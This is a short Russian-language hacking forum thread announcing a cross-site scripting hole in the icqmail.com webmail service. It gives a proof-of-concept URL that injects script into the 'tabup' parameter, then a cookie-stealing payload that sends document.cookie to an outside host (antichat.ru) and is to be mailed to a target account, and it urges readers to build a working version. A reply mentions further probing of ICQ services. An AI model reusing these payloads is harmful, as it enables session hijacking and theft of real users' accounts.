|
www.icqmail.com [XSS]
Для тех кто не знал:
На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =) Код:
http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script>Но, как ни странно есть НО. Посылается письмо на мыло icq@icqmail.com от наивного чукотского парня с примерно вот таким содержанием Код:
<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт. Удачи в реале |
Неплохо....кстати Я щас и сам раскручиваю сервант асикю, думаю к концу недели предоставлю полный доклад, ибо баг уже найдено впоряде!!!
З.Ы. Кто украдет мои идеи, получит по голове ))))))))))))) |
| Время: 04:59 |